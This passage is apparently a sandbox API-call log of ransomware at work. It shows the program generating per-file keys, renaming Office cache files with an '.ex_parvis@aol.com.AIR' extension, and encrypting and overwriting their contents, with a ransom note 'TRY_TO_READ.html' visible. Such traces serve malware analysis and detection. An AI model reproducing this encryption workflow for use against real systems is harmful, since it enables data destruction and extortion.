	[0075.223] FindNextFileW (in: hFindFile=0x5da1b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e9f7d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e9f7d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e9f7d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.223] GetLastError () returned 0x0
	[0075.223] FindNextFileW (in: hFindFile=0x5da1b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e9f7d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e9f7d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e9f7d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db6c0
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.224] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.224] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.224] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0075.224] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0075.224] GetProcessHeap () returned 0x540000
	[0075.224] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db768
	[0075.224] lstrcpyW (in: lpString1=0x5db768, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0075.224] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.224] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.226] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474
	[0075.226] GetProcessHeap () returned 0x540000
	[0075.226] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db768 | out: hHeap=0x540000) returned 1
	[0075.226] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2362) returned 1
	[0075.226] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x93a
	[0075.226] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.226] GetProcessHeap () returned 0x540000
	[0075.226] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.226] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.227] WriteFile (in: hFile=0x474, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.228] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.228] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.229] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x93a) returned 0x5db768
	[0075.229] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x93a) returned 0x5dc0b0
	[0075.229] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.229] ReadFile (in: hFile=0x474, lpBuffer=0x5db768, nNumberOfBytesToRead=0x93a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db768*, lpNumberOfBytesRead=0x3a1f778*=0x93a, lpOverlapped=0x0) returned 1
	[0075.229] SetFilePointer (in: hFile=0x474, lDistanceToMove=-2362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.229] WriteFile (in: hFile=0x474, lpBuffer=0x5dc0b0*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dc0b0*, lpNumberOfBytesWritten=0x3a1f778*=0x93a, lpOverlapped=0x0) returned 1
	[0075.229] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db768 | out: hHeap=0x540000) returned 1
	[0075.229] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dc0b0 | out: hHeap=0x540000) returned 1
	[0075.229] CloseHandle (hObject=0x474) returned 1
	[0075.230] GetProcessHeap () returned 0x540000
	[0075.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db6c0 | out: hHeap=0x540000) returned 1
	[0075.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db618 | out: hHeap=0x540000) returned 1
	[0075.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db618
	[0075.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.230] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.230] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.230] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", dwFileAttributes=0x80) returned 1
	[0075.230] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 76
	[0075.230] GetProcessHeap () returned 0x540000
	[0075.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0075.230] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab"
	[0075.230] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.230] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.233] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474
	[0075.233] GetProcessHeap () returned 0x540000
	[0075.233] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.233] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2928955) returned 1
	[0075.233] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2cb13b
	[0075.233] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.233] GetProcessHeap () returned 0x540000
	[0075.233] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.233] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.234] WriteFile (in: hFile=0x474, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.236] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.236] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.236] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2cb13b) returned 0x3a20020
	[0075.236] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2cb13b) returned 0x3cf0020
	[0075.237] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.237] ReadFile (in: hFile=0x474, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x2cb13b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x2cb13b, lpOverlapped=0x0) returned 1
	[0075.398] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.398] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.398] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", dwFileAttributes=0x80) returned 1
	[0075.398] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 79
	[0075.398] GetProcessHeap () returned 0x540000
	[0075.398] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x104) returned 0x5db618
	[0075.398] lstrcpyW (in: lpString1=0x5db618, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml"
	[0075.399] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.399] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.401] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474
	[0075.401] GetProcessHeap () returned 0x540000
	[0075.401] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db618 | out: hHeap=0x540000) returned 1
	[0075.401] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1383) returned 1
	[0075.401] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x567
	[0075.401] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.401] GetProcessHeap () returned 0x540000
	[0075.401] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.401] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.402] WriteFile (in: hFile=0x474, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.403] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.403] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.403] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x567) returned 0x5db618
	[0075.404] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x567) returned 0x5dbb88
	[0075.404] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.404] ReadFile (in: hFile=0x474, lpBuffer=0x5db618, nNumberOfBytesToRead=0x567, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db618*, lpNumberOfBytesRead=0x3a1f778*=0x567, lpOverlapped=0x0) returned 1
	[0075.404] SetFilePointer (in: hFile=0x474, lDistanceToMove=-1383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.404] WriteFile (in: hFile=0x474, lpBuffer=0x5dbb88*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dbb88*, lpNumberOfBytesWritten=0x3a1f778*=0x567, lpOverlapped=0x0) returned 1
	[0075.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db618 | out: hHeap=0x540000) returned 1
	[0075.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dbb88 | out: hHeap=0x540000) returned 1
	[0075.404] CloseHandle (hObject=0x474) returned 1
	[0075.405] GetProcessHeap () returned 0x540000
	[0075.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db570 | out: hHeap=0x540000) returned 1
	[0075.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4c8 | out: hHeap=0x540000) returned 1
	[0075.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db4c8
	[0075.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.405] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.405] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.405] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", dwFileAttributes=0x80) returned 1
	[0075.405] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 79
	[0075.405] GetProcessHeap () returned 0x540000
	[0075.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x104) returned 0x5db570
	[0075.405] lstrcpyW (in: lpString1=0x5db570, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi"
	[0075.405] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.405] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.407] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474
	[0075.408] GetProcessHeap () returned 0x540000
	[0075.408] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db570 | out: hHeap=0x540000) returned 1
	[0075.408] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=873984) returned 1
	[0075.408] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd5600
	[0075.408] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.408] GetProcessHeap () returned 0x540000
	[0075.408] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.408] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.408] WriteFile (in: hFile=0x474, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.410] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.410] WriteFile (in: hFile=0x474, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.410] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd5600) returned 0x3790020
	[0075.410] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd5600) returned 0x3a20020
	[0075.410] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.410] ReadFile (in: hFile=0x474, lpBuffer=0x3790020, nNumberOfBytesToRead=0xd5600, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0xd5600, lpOverlapped=0x0) returned 1
	[0075.441] SetFilePointer (in: hFile=0x474, lDistanceToMove=-873984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.441] WriteFile (in: hFile=0x474, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0xd5600, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0xd5600, lpOverlapped=0x0) returned 1
	[0075.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790020 | out: hHeap=0x540000) returned 1
	[0075.454] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20020 | out: hHeap=0x540000) returned 1
	[0075.458] CloseHandle (hObject=0x474) returned 1
	[0075.463] GetProcessHeap () returned 0x540000
